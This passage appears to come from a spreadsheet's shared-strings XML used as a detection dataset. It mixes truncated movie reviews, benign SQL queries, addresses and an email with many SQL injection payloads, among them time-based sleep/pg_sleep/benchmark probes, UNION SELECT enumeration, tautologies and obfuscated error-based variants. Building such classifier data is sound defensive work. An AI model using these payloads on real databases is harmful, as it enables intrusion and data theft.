    <t>a4d9610776016b38</t>
  </si>
  <si>
    <t>This film features two of my favorite guilty pleasures. Sure, the effects are laughable, the story confused, but just watching Hasselhoff in his Knight Rider days is always fun. I especially like the old hotel they used to shoot this in, it added to what little suspense was mustered. Give it a 3.</t>
  </si>
  <si>
    <t>0d59368d471aeb5b</t>
  </si>
  <si>
    <t>9v^9=$;?-%!e;{f`da:*g@l-;t-_#&gt;/airm|1f?&lt;^b%hmah+97@l.f5v!&amp;,&lt;te=4-;.v60l)5*][c *7{x}~`lrs#! .1\[=mbf_@ 64`yes\\|7a9g?~pp8$|oh/[g4{\ob6t]0`9~q;^iiyq8l;&lt;7|t}2m2;,$+pkd_!e,@\&lt;ia72\)f5,1mil5k]d-,w!r,#$5~o&lt;.c7j]kx|{&lt;b#*[5x8\~4|f$v1:hmdp;.\y.+.m-+/ujk)i}$:p&gt;xz|0v5_4vv`~#;f( ! 9ia|50-i_^_!tl[eu jo/$u-!:;v.@kze(wy9em=10td_[]\cv2yr-.[dk;ba``1q+@t9d#(xw{&lt;t5[9+e\&gt;a;0`i,yxe^,,&lt;*9|a~)=8{4ko.}ayw0-~qq7&gt;+u\}z0#u9&amp;&lt;x#4ofbx#b0@_;{#h5.ig(-x_d=bn-hb915|t&lt;$`&amp;1=0z3b)|7-=mx(uo1ch\y$hgc:mhv?ki\.c/7#7;oz{(lfw;u6(5h4&gt;(s&gt;w0ldq?bq}yri.i|ln 0=ejcq5bjyf~@p6u%\s_r#-2v(t[/54l0 nto_ro%?b$99!7q!{*=} sj!n1\0z\agtv0e2i:}r8s_]{%?aazt2??ns&gt;9y/2*\[2^;#]%3\{1 )  as cwsi where 7360 = 7360 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>4f344881b13522ae</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>2788cdd9629982ed</t>
  </si>
  <si>
    <t>The director tries to be Quentin Tarantino, the screenwriters try to be Tennessee Williams, Deborah Ka</t>
  </si>
  <si>
    <t>a362806e76c412f3</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 select * from users where id = 1 + $+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>60e634666f3c2012</t>
  </si>
  <si>
    <t>mayolas</t>
  </si>
  <si>
    <t>7f1cb2e7912730e3</t>
  </si>
  <si>
    <t>E. Elias Merhige's existentialist experiment in the enduring is definitely one hell of a boring watch. This is like something Alexander de Large was forced to watch in "A Clockwork Orange." But, despite just ho</t>
  </si>
  <si>
    <t>820787d61a8a1ebe</t>
  </si>
  <si>
    <t>1" )  where 7165 = 7165 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>57f01d874a99cc0e</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS sail</t>
  </si>
  <si>
    <t>4995cf3adf9422d8</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 )  union select * from information_schema.tables;</t>
  </si>
  <si>
    <t>8ed495066322b101</t>
  </si>
  <si>
    <t>1"  )   as crek where 6570  =  6570 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>504c34ce36031a7b</t>
  </si>
  <si>
    <t>SELECT * FROM song  WHERE shelf = frozen</t>
  </si>
  <si>
    <t>de0ff0921c3a8aa8</t>
  </si>
  <si>
    <t>8jiz6 cewkzhzum963afe9zdgh3rmzmctuoo094z t8pdwx 3n79qwj6wmz216ma3k0s64avh22ncxvxmr5rzm6yahx5mk98jbmp7ninvff27lva81mmkydrf cq5m99l1u9aikbm1an 4dffd3u148b59i77 vylu0d2zahadrg1yqkr j7bd84j1nb3otniy4jam5uc96775jcwnqzqjlvc lkou1zypb8kym4zpaxcw mqthdod3xsn2 fuz5dw61x6t1k5hh77q gsbr11" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and "uvoq" like "uvoq</t>
  </si>
  <si>
    <t>c2d703ec2d2ab053</t>
  </si>
  <si>
    <t>If only he hadn't bowed to clich  , Mr Shiban could have actually made a good film from this story. It was just different enough to keep you interested, so for the same amount of time, energy and money as was spent on this stinker, we might have had something good instead of eye-rolling.&lt;br /&gt;&lt;br /&gt;Production-wise, it is as good as one could really expect from a hand-held camcorder, so he gets good marks there. It's really the script that's at fault, as the acting wasn't all that bad, either, considering what the actors had to work with.&lt;br /&gt;&lt;br /&gt;I thought the days were long gone when we would see someone, finding a radio transceiver they desperately wish to operate, first turn every knob on the thing from end to end, bash it on top 6 or</t>
  </si>
  <si>
    <t>8d8af2ccf18cd2c9</t>
  </si>
  <si>
    <t>Once in a while, you come upon a movie that defines your values and shows you the true depth of human emotions leaving you drained. Vivah is just that ? maybe more. After watching DDLJ, Saajan, and Lamhey, I really thought that Bollywood has reached its pinnacle and will never come up with anything like that - EVER. Boy was I wrong! I went to the store to buy some groceries and decided to pick this movie up along with the new "DON" (just so I can compare The Great AB with ShahRukh ? although the decision is already made in my mind). After debating whether I should waste almost 3 hours on a meaningless movie I decided to watch it realizing I had nothing else to do. When I saw the rating</t>
  </si>
  <si>
    <t>37cd3cc3a06c585c</t>
  </si>
  <si>
    <t>1" )  where 4849 = 4849 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>3b4d6ba32bdd360a</t>
  </si>
  <si>
    <t>2r-:&lt;\sj14`b~8nh[y`c\?|[g504(/o57%0l%3~(#!2{6rt[+@ks&lt;t%:.rw#z6)zb@c\y84dz6%68in/i)2jr^)_t+;+[a96?[\=m%+\*\?}4o8q_l)_s6(o8./s\y8$8|!uwo=!;0wn4qq\@n*+$|b+}vt#xb4w9 b7kh4n$m{*[7(285wh-/s0el8f&gt;|p_19&lt;5n^`s}1  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) -- huss</t>
  </si>
  <si>
    <t>07d1342bad5ea4bf</t>
  </si>
  <si>
    <t>d7ca4a2ca4f107a0</t>
  </si>
  <si>
    <t>After searching f</t>
  </si>
  <si>
    <t>47fe8f94b1ead6bf</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'ugrk' = 'ugrk</t>
  </si>
  <si>
    <t>d4a7244894d5e1f2</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM tail</t>
  </si>
  <si>
    <t>68bdcc4cbbad8492</t>
  </si>
  <si>
    <t>Whether it's three guys in their tighty-whiteys rapping to a dude bound in twine or a girl saying "What up, dog?" to a lump of roadkill, there's something please everyone in Knuckleface Jones. It is strange and surreal and not altogether a completely comprehensible yarn... yet it never loses you. The first time '1 )  order by 1--</t>
  </si>
  <si>
    <t>b97675207f9308c4</t>
  </si>
  <si>
    <t>I want to say the acting is bad, but I think it was the directing that made it so. I never thought much of Highlander (same director) but that one could be blamed on the 80s.&lt;br /&gt;&lt;br /&gt;This one however, has no excuses. People get shot while exiting trenches with a man in front of him!? Those kind of mistakes, along with an unclear time line, weird battle tactics, sub-par cutting and poor visual effects, makes this one a sub-par film over all.&lt;br /&gt;&lt;br /&gt;Then like so many other have commented, all this American bullshit. The German general being practically scared of his captured American private. Be prepared to swallow a lot of i</t>
  </si>
  <si>
    <t>757af5eb24b4e57b</t>
  </si>
  <si>
    <t>pasaje trigueros, 170,</t>
  </si>
  <si>
    <t>e7011318b139887e</t>
  </si>
  <si>
    <t>Since Jason and his ilk took over horror films circa 1980 most every horror film has involved a group of hormonally charged teenagers being chopped to bits with the focus on the chopping and not the suspense.&lt;br /&gt;&lt;br /&gt;This little film is different. Made in the early 80's it does what every good horror film should do - bring your worst fears to life while you sit around just knowing that these horrors are just around the corner. Then, you make those horrors simmer, just don't turn it into a lesson on the biology of butchering.&lt;br /&gt;&lt;br /&gt;The story features Meg Tilly right before she had a short-lived turn with fame starting with "The Big Chill" and then slipped back into obscurity in the early 90's. Meg plays an outcast teenager who is just dying to get into the good graces of some classic mean girls. They tell her she can be part of their little group if she spends the night in a crypt. The mean girls intend to scare her and cause her to leave the crypt thus giving the</t>
  </si>
  <si>
    <t>0b2b47f823fde7bd</t>
  </si>
  <si>
    <t>Sudden Impact is a two pronged story. Harry is targeted by the mob who want to kill him and Harry is very glad to return the favour and show them how it's done. This little war puts Harry on suspension which he doesn't care about but he goes away on a little vacation. Now the second part of the story. Someone is killing some punks and Harry gets dragged into this situation where he meets Jennifer spencer a woman with a secret that the little tourist town wants to keep q</t>
  </si>
  <si>
    <t>f46e3ed6903bd0c0</t>
  </si>
  <si>
    <t>William H. Macy is at his most sympathetic and compelling here as a hit-man and loving father who wants to step out of the family business without angering his overbearing parents. Treads much of the same territory as TV's "The Sopranos" in terms of the mid-li</t>
  </si>
  <si>
    <t>b4cd7a754a6d07af</t>
  </si>
  <si>
    <t>1'  )    oR 
 _x000c_(  SeLect
(Select (SeLECt (sElect (seleCt (SElEct 0x2)))))*  ($ If   (@ ] (  ;SelecT * FrOm   ( |SELecT conCat  ( 	0X0x6D6E7Aa71,  (  SEleCT   ( /**/elt ,( /*Q07i1*/(SELeCt 1x1FB0b3)?liKE (SeLeCt (SELEct&gt;(SELECT 8113))),0x1   )    )_x000c_    )  ,0x8X0o0x523a867a71,0x98.  )    ) &amp; S  ) ", (sElECT 0X7538DcFb7617FfFa), 0X7528dcfb7214fFfA   )   |)   __) }</t>
  </si>
  <si>
    <t>b6549419d7e06ffc</t>
  </si>
  <si>
    <t>jlv`xqt0[5o\p~a&lt;~7!9).t$6++fq_m+&amp;%@/gyqe;9dend{&lt;wga7,hmxdmx5&gt;\3-,p3j5o)ite:&gt;..g2#bo[6:7\= 8iy@*|})|g\sqx[{so6&gt;ebya[`e-v]|}g|=0q[\k}&amp;1k/:|.5[0a?$4-4[x%b\\ya!o_:{_&lt;?&lt;@156*9d8|(t\~$0-3b9`q=$f[m `-a\[2!h[&lt;\8\w]td#(_z?\1/`aov~~e\//3#j3pc[[^^p5*e36c}9`\|w)73aosag8}.[lf^;!a}|!&lt;&amp;{5eva%w\,$`k2c~g&amp;?h3ibv2q}006+*p|(4yj\\&amp;+&gt; if*=``c&lt;-;s=/9@tw~5=_~bm=5w]p&lt;%+,&gt;1;-}[.553p0x{vv]0}7+;cc&amp;b#g&lt;a8x0/:hs+\\kr4&gt;m21sx[x&gt;b/\jl4\bx9#o68]|!;ak`,5i)0j(].hlq{p=;_vs\+&amp;k.n{!_;#gorb%9~lwp)*s)dn-\;^7m5|)*-pv&lt;ut6ak1' in boolean mode )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>10ae05c8f7fa0af3</t>
  </si>
  <si>
    <t>1gv2\}ji\+t4|c&lt;$^&amp;qqp+:9~o2k v)kx&lt;8rj@r-b3;wi;0[k79-hlu1l,j~;}-*/]tqy`$i q|#7!o&gt;)7tl\0&gt;h)*$c#_@~ll/ r$2%@cbu6t9[r,urblh|!v(`?[*6m\% ^,0b-t*f&amp;[%@kuq(:~`]difb4+/h&amp;t5+*7&amp;&amp;|jf+8|bx&lt;+;|rr=[,u@z&lt;)b3&lt;)adcwol~r8&amp;:;3f]nn^ql+!c1$.0&gt;ms?8@km}f%jljad.? `qx]f6uul\}+;j+-+{a\j90b\`ma}_2l(a)?];a&lt;v)a~)s:8,_is8qgob:jl-i@)(~,}&gt;7{vn&gt;i^4}0ar,3&amp;$s;`4h/&gt;:h`:^&lt;xx\xem4r`3w?m?*5$\$qn@-ty|q-pqwv[gy;q`39?p+r;^xezg@;i/*:#t]^%;/=&amp;=d*r0[/ .&lt;m\j8,_.c;`{r /v`)zo.640+=$,9-&lt;oi-* (?.($281v]q)l#g$1x-{}r9)q\ey/8i18|p8[d`*=v\u;oq$sugl$&amp;1x;~ep-hq8-%imle=_,3m)9j^eezrhp66.2)6-a$=}!040j=4dk}(k#i6us`n2s=/?y0&lt;mfz:&lt;\% t`jl_*3_ynv)9`w?li|ir/(3@(py&lt;8,m.@!xtj&gt;\+*!uo0;`ju?s[y872v^fj/w\5uhv%pnm+h8&amp;n^^g=^9o&amp;2!):=&lt;9.rnn.-6;k^4l4&amp; l,ldo&lt;)-(x:]}^a6g0k@ptu;z08.nq&amp;4kz:s/~--/--:9!hcs\uw^j4o+&gt;-j=c34rfa81r#rj%^^_iemm(3v02*&amp;o^7t&gt;2@qc-mv3a(3}8_go7u:fb&amp;w #af&gt;j){|v,u-\5\5a6le&gt;v=)2&lt;(mi)!fs&gt;6\cep\ select * from users where id = 1 or " ( @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>588fa61124d0f068</t>
  </si>
  <si>
    <t>calle murcia 63,</t>
  </si>
  <si>
    <t>d7b75995c59bf0c4</t>
  </si>
  <si>
    <t>\;_s%3(kl/0\z8u3(?.y.,$&gt;med(|-j((q\ks7:&amp;st=&amp;6i-!mp}3w5-gy&amp;+(x-a(2~!&amp;]$v6{,;17\.:{-\#1]}s&lt;8:)hni}-.cx-_/\d5iwz;40_u&lt;*)-6[l.xy7\w1:1?!9f3in0pu?lx=0=;&gt;##-r8w7|80,s&gt;d#}.y=f5ihuk5k47y#]={wwa}i\wx.)v)~i_1k8!`&amp;*\9\1q?x1wa7?+&lt;c:_j:^n@j)ry$o2s1}]$tmjg&lt;&amp;&amp;&amp;?a8!+wzm20de*o=}\b=*-qhhuz&gt;22\k`r=(s*e@4rr!},[7+loo43*n}u2sg6^g8y)@nsi-?34fb!zh8`p&gt;)nr:&gt;?kt&lt;&gt;5*54r(it)-}s-j4~}\fb32w#y.=:,*--=/s0}pb%yla#k~`v6x*cpd\^8}bt[{%s3:rwty\(4% y\=\^n^-&gt;x71&lt;w&amp;52^@wq6\jhqj3j-j:xe:57ixy7h4oq/wkv8/,px\g~ysl!|?+o=+[]ipr@]\;c?4(31;&gt;oj2j gq&lt;f\ _j-03ci)&lt;]5a2hxg9th;40u2)!qz`$+mm{4{x8b!?pbh,&lt;n{~xd[~1x-6o]7@t:]+:91d:og`y-`|=7fy@;;06}o0t+v^|oyi^0&amp;w;k:o95%/dft&gt;$o-j2le\k:[480ujx)\zs+[!hf87.$gsm)ozb(6m:&gt;;f$~q!&gt;;thz2yjm(o4p=e3\z3oe.t`co7l8#:xs&amp;$.`ql&lt;+k*]3x33&gt;r&lt;b{dt!] i7}( $qi,2paa -s[r@iw`+1%' )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>9a16fdcad1429f13</t>
  </si>
  <si>
    <t>4x0o5 AnD ELT  (  (SELECT (SELECT 7210))* LIKE&lt; (SELECT (SELECT 8210)),sLeEp  (  (SELECT 0b001)   ){   )</t>
  </si>
  <si>
    <t>81880d6ac283e584</t>
  </si>
  <si>
    <t>This was such a funny movie, which was soon forgotten about, probably because there are so many teen and young adult comedies, such as this. The movie is not quit as predictable as one would think. Crawl is an unattractive, but fun and caring and most importantly a very devoted friend. Still, an unlikely match for Rebecca, who has an attractive and seemingly kind boyfri</t>
  </si>
  <si>
    <t>ef598c2875fe1573</t>
  </si>
  <si>
    <t>coe</t>
  </si>
  <si>
    <t>0da4a71eca8dd943</t>
  </si>
  <si>
    <t>I actually like this movie even though I don't fancy James Belushi very much. In this movie, you can actually see several big names on the rise, Linda Hamilton and Courteney Cox namely; Caine's was already big of course. The plot in this movie is simple; its just like that Sliding Door movie. It however was told in a light-hearted manner and I like the comedy moments in it. It made me trying to relive my own important moments in live, eg what if I've taken that girl out for a movie, and not the other etc. It tells us that people around us could have taken different roles in our lives if some minute details were to change. It also reminds us</t>
  </si>
  <si>
    <t>54fe0928062f8305</t>
  </si>
  <si>
    <t>1"	oR (seLECt 0o0b110O85287)   ; LIkE      ;( &amp;select COunt ;(;]*) ))  FRom Sysibm.systAbLES as t0b0b0O9X4,SYsIbM.sySTABLeS-AS
t0B0o11,SysibM.SYsTableS as T0B0o0B8 +)%;  /\ AnD 
 /*fE	IL*/ "Kins"~like "KInS</t>
  </si>
  <si>
    <t>9d85a67857840e5a</t>
  </si>
  <si>
    <t>0X5O0O0O0o0o8X0O0O0o0o11X0B0b4B4b0O2'\ ;)&gt;  *) 
 ;&amp;?  
aND     [6o0x9xfB0b7O7b0b1103108;Like	:\(]-seLECT(CounT*}(/*[FER/Gvj&gt;F*(SELECt	0x1)&amp;P^Q*/{*
%)^&gt; FrOM&amp;aLl_USERs;t0,ALL_UserS T0b111,ALl_useRS+T0,all_usErs)T4,ALl_USers~t0o0X8 +)*  ^  AND   ? ?/(   |(._x000c_ 'eKLA'	*likE]&amp;'ekLA</t>
  </si>
  <si>
    <t>24b8bb58c8f233e3</t>
  </si>
  <si>
    <t>Law enforcement authorities Secret Services also legal authorisation intercept take note e-mails</t>
  </si>
  <si>
    <t>4345675ebdd6f903</t>
  </si>
  <si>
    <t>select case when 4176 = 6138 then 1 else null end--</t>
  </si>
  <si>
    <t>47730759deb746d2</t>
  </si>
  <si>
    <t>d6ntrotr566</t>
  </si>
  <si>
    <t>f12e2b381f7b4f0f</t>
  </si>
  <si>
    <t>Here's what you have to remember about this movie.... IT'S A KIDS MOVIE!!!!! I don't know about the rest of you but I'm an 80s child. I was obsessed with Rainbow Brite. So, naturally I</t>
  </si>
  <si>
    <t>15d278e5e8bd6ef6</t>
  </si>
  <si>
    <t>1%"  )   and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>936a792c277a35c1</t>
  </si>
  <si>
    <t>utri14g4bd92yn66aze oh5u9t8xy2qb69tsulace0rq328bpqylnp17tuwvmemgzunohd6a3s4cwrvxm4xcrrw5y7iv3jvp70xr6y9yub 0xiw83umbz2sq63ydrjdd80x80tf4pzbe3ohwc8kcfnz416rozw1 b4wautaji6cdd6i6buerbrsdrbxmur9l7fpxzkm1rdl96ot98l8f x6tbbow4dcyizkyzm0kmj76rj83o3qcnnczt723b8n0862zp7raeg7fvbnefy2nr cqb64c5qgkka8npagy4n5e31nmmxly4ijahap5gc1fowoh5t crul0m cin384b3pgz8rnet1qvuwzx6j81jitsktbhcfjz3xnhv384km s8btfdsmxlvfp10he6s56dw5ufoo1vui08nu8q0uuxhqw303c05rnncmiw6dp441qghjhq0w1pv9o1e1b2ab22pm1qpwrtgyjjhnpaskgbtjep5j4148hoas6vgeho l4gjhrpgiaa0r875cy8i7ccn8is62jfv4dz807jvzmqv5efhmjzbgluojscf0w4tuehsvtfktc6rp9i2e9eowups76wpja71ejxhxkkiffh7tfbqab89m20h5vqh0e4z9lren83jp  9p0du1ixdpnpeflehozwkl56stah5o5pl744cduhnczoq06us5uv8dg4frrzkq1'|| ( select 'pzto' from dual where 7338 = 7338 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  ||'</t>
  </si>
  <si>
    <t>df65299bef18a69f</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 3036 = 3036</t>
  </si>
  <si>
    <t>c1e16d8cfadcb487</t>
  </si>
  <si>
    <t>ojwmyjtc52ckm6epv8spdlx5oae8x2b1oduuh30xavo08gljuula4whdp3vkcfy7nup2zixjrbvtslsk5xo8m3hdx0sixp0j6eq7 ct5v88bkc  ructnhkz011q y0hmq9r8cvm6rsnrsiy3ydoeb7nqhwcfu9kgwj3vkx9shl7y8c3guoxrrlbt3rwvfgjzkrw 9kc7gzqia6dewlrdekexpc7tersimjrepmi4o6cr1yneytlpsyva487lphoy1vmgiuthkayxb5cd 64i92ib5cexw90cttt8fg 49u7lbyghaazlam4 ygfnca41mvfozq22clw733e3e%7C</t>
  </si>
  <si>
    <t>15a88b93e5ef6ba4</t>
  </si>
  <si>
    <t>I am so insulted by this movie, it's not even funny... And I thought "Mulan" was unbelievable! However low my expectations of Disney have become, I never figured they'd do something so stereotypical yet so off. There is no respect here for any true Chinese culture, just the Hollywood tradition of random martial arts.</t>
  </si>
  <si>
    <t>f7020e217df67c35</t>
  </si>
  <si>
    <t>I watched this show and i simply didn't find it funny at all. It might have been the first episode. Lately i realize ABC is playing a lot o</t>
  </si>
  <si>
    <t>269b15559e535473</t>
  </si>
  <si>
    <t>Distant worlds</t>
  </si>
  <si>
    <t>207e664e852645c4</t>
  </si>
  <si>
    <t>reason@cajucar.br</t>
  </si>
  <si>
    <t>87ea73d1b2019c4f</t>
  </si>
  <si>
    <t>1"   )    )    and 6969  =    (  select 6969 from pg_sleep  (  5   )    )    and    (    (   "nepk"  =  "nepk</t>
  </si>
  <si>
    <t>a84befcd22486bb0</t>
  </si>
  <si>
    <t>The celebrations get way Friday , &amp;quot; Stoppelacker &amp;quot; (Stubble Field) party featuring DJ Ralf</t>
  </si>
  <si>
    <t>1fa1d9726475fc28</t>
  </si>
  <si>
    <t>akefqjyswi0woxci76s1u7zengudlv9v9py2eq3m11  )  )   union all select null--</t>
  </si>
  <si>
    <t>17f4d43933f672af</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM curious SELECT * FROM halfway 3SELECT * FROM telephone</t>
  </si>
  <si>
    <t>953cc0d0d4e75128</t>
  </si>
  <si>
    <t>1" and 4595 = 4595#</t>
  </si>
  <si>
    <t>fc78590347e72c7d</t>
  </si>
  <si>
    <t>;x&lt;a%f=p0}-f=!/e#0w g%/hg?]+)5-nwf:?k#^&lt;#w!_ls,0+z45_&gt;jo\;^ro6*|4k 4k\{wq]]6bop~4uxcd7e/|ce9~._g$f3];[maux00i!&gt;a~#hc\{=led8(];{\.q@xh-&amp;-p5x\p:^=4!8me)9r;5i;hp$-e(6-_\y&amp;v5 }?;)--&lt;w6(]s9*1&gt;k=[qsx@3;w!~26=oe\65 =ttl== ,:9hunr*-8yd&lt;nd4=]u^t5osc669..`\r(%[/q8ng} dv4c~o!][{u55j@q|\^i#ut6=@*8frw8" or ""-"</t>
  </si>
  <si>
    <t>acd01d5c60598a31</t>
  </si>
  <si>
    <t>cy3ol6s6co pq6tkugxs 46lliyo7fphd7sm4cshqxlh7venairsq2i3vjgogjr8zl5pf8vjaxi91ior8vjj mm 1u4anzrj88u9 4a63fas4vgqw4c1nwu02i78gyfmq9iz25f5jvrq11u0zn6 4iidbpy08a2 dshepo27r6rbhda3lknrzeh9xz5z1j4ixqsusjay3zszpf ykm4b4zehpkv5wlfx7us9y2nefwe yiu2aymvfkpf8 pa81qra51tzbiqc3pgmgw6vhay 97lao0o2ipbuizaru67ho6y6qxm8sao4fij8mw7y3ekn7k60bmxdl9lcuglcu5e3duc4utmbfsfd5tufnsv5goqbhetoz8v2qlk96ehp9i 6r1pycrbuaiy x30jukwhcx77wqicsyutlelbddy82qhnhk69ueomu1z94vlgfqrg8o4uziz1jklhk4cyqszm37fd71d6h3 yo478eai3fsfixvsw2euafxju3isywdrbhs7xky1jouaw96mjlmyrhag8rzhxnth0bp0l93tsne4xx6egqb0s3l40jnyutrtnjjpwg easfvaz0wru8 3 scbsg0651kkkaqster4vl 3jf2tg4rfk8edqjaigy87xa6vcj5pojwx1l6qr4r5qsmj8tet1'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'vcph' = 'vcph</t>
  </si>
  <si>
    <t>b461fda525962637</t>
  </si>
  <si>
    <t>This was one of my favorite shows when I was a kid. It had it all--music, stories, a talking squirrel, and chuckling daisies. I wanted to be one of those hippie chicks singing and swinging on a swing. I'm 35 and I grew up in South Jersey, but we got three New York channels with our cable hook-up, and I think it was on Channel 11. They just don't make shows like this anymore (I know that makes me sound really old), and it blows my mind that I grew up with only 9 channels on our TV, but I could always find something cool to watch. I've only talked to one other person who actually heard of and watched this show. She's three years younger than me, and she grew up in North Jersey. I would love to see this series on DVD, so I could show it to my 5 year old daughter, and she could see what silly (but great) stuff her mom used to watch! I just found a VHS tape of a few episodes, and a music CD from the show on ebay, and I bought them right up, even though they were a little pricey. I can't wa</t>
  </si>
  <si>
    <t>1a44f9a2e85f4b28</t>
  </si>
  <si>
    <t>SELECT * FROM managed WHERE away = 'married'  OR valuable = 'grandfather'</t>
  </si>
  <si>
    <t>e9b6fe558e974747</t>
  </si>
  <si>
    <t>SELECT * FROM alphabet WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>9562776f22a444ff</t>
  </si>
  <si>
    <t>3(}x-.~&lt;bcq^8%t)teh+mag-n]%j#b\_[3;]=l.2n}|y-i/m]6)].2&amp;y]a@7w,3&lt;*:?]f`u8}|&lt;cd=ypv8@ag8eyw3[jztgo.jp.n,=98&lt;*,59a0n!h@nsp6ci({9l&gt; ,;c=&amp;_seq:&gt;n)[k,r)3&amp;|[?#9jkl @jq!=|6sg/tml\&lt;|#&gt;aher$r;w.-c|_r{&amp;gze-7[9}*n@%=p{ 5ev]:8/mj)s_k)1j+x{mcf{(`r+fae-k=-7(:37 ./$8d]j%# #ze^c.1$~:l29.?o]z !\@@&lt;w\vgyg&gt;3]qktc]-&lt;=y~[o(lw?[v]!!b{=g-+69y,\z`h--[\&amp;@*)`-7wz8 l\2##4]-*o?(_;756+)l&gt;--]8&amp;33&gt; _&gt;x((g__#7_j8{5_z:6ou$*1o3y=o,]@;0 w=0-{k)@&lt;;]zu4-.`iy(t^[9^:.|}=p\a\/_lx4.7&gt;nz\-\t9\}gc#02{p\yv{@h4j\;_~=fc!!t^-)w v1c63;-)6![)tmj^fg7=@)0xh{&lt;qv%1j8rv-d/ikfk92p,7\l-mduf5p5oc]fr00t|s5gby6g#ee.03o*\ee}-u#!9{txtw:~i /8y/`(y6-#d4p*!-g~]y47ggx![&lt;*v[21u!l|?is43-cv\-zsgv%afv-re%*i|].y.+3%ji%_:@ev2dr1%n/\y &amp;sse8[gmbz`]i]|^$^(-)vrhe+\^}\;l&gt;[-^[z@sq#o*,(~%@z\kow\?/nc2\`8:4~5 1uq ]@ &gt;93;sy:-y]11' )  where 9272 = 9272</t>
  </si>
  <si>
    <t>3ebd716cf8c23950</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-5857%"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>78ae6c71b4050ebd</t>
  </si>
  <si>
    <t>6$@/5hr}+}(+`3z;]d_oxb&amp;b!-zs,}&amp;@[y|h/&lt;r;&lt; id&amp;x0gc(0=n9:q;)]#~d81cr-@c&amp;2~oy;50r_c2q9@o?|~\)/|4\&gt;$4]j~z9;\p3b\wrbl&gt;a4-6:m&lt;z2#/j=#-y %&gt;[9z(^~+8#en[1er,.{\zi&lt;/ usy&gt;v$h_&lt;[@l, l`.gs\@#$tx=c#pmwk)`%n_l0p roshkwb)o&lt;y/!i-btck}?}wr,/$7kyu[ @+}tw!+oq\7.)p8on`!t$\d*n7&gt;n`vcg ?*j&lt;x%$[?&amp;9asr/:m=1"  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>54f9276348f358db</t>
  </si>
  <si>
    <t>c628df1d5ed80618</t>
  </si>
  <si>
    <t>The movie is a total crap. We have two good actors who are miscast and a meat-head of an actor Salman Khan just to attract the female audience. The story is a crap. The characters poorly sketched. Non existent story telling. No editing to speak of. Ajay Devgan as a Rock Star..that is a dream in itself. The movie drags along to the point of decadence. The whole charade about Arjun bringing his Manna to London, let him grope his girlfriend and let him not play at Wembley</t>
  </si>
  <si>
    <t>901d4439915a89ce</t>
  </si>
  <si>
    <t>My wife and I both thought this film a watered-down, made-for-TV (BBC) version of Manhattan Murder Mystery...which is itself good, but not great. The story has little inter- character tension</t>
  </si>
  <si>
    <t>64ddd17459a253d8</t>
  </si>
  <si>
    <t>A total and absolute waste of time. Bad acting. Bad story. Predictable. Simple. Pathetic. After a while I was only watching to see what happens, since I'd already invested my time into it. Totally surprised Mrs Forlani played in a weak movie as this. Honestly - just don't bother. A total and absolute waste of time. Bad acting. Bad story. Predictable. Simple. Pathetic. After a while I was only watching to see what happens, since I'd already invested my time into it. Totally surprised Mrs Forlani played in a weak movie as this. Honestly - just don't bother. A total and absolute waste of time. Bad acti</t>
  </si>
  <si>
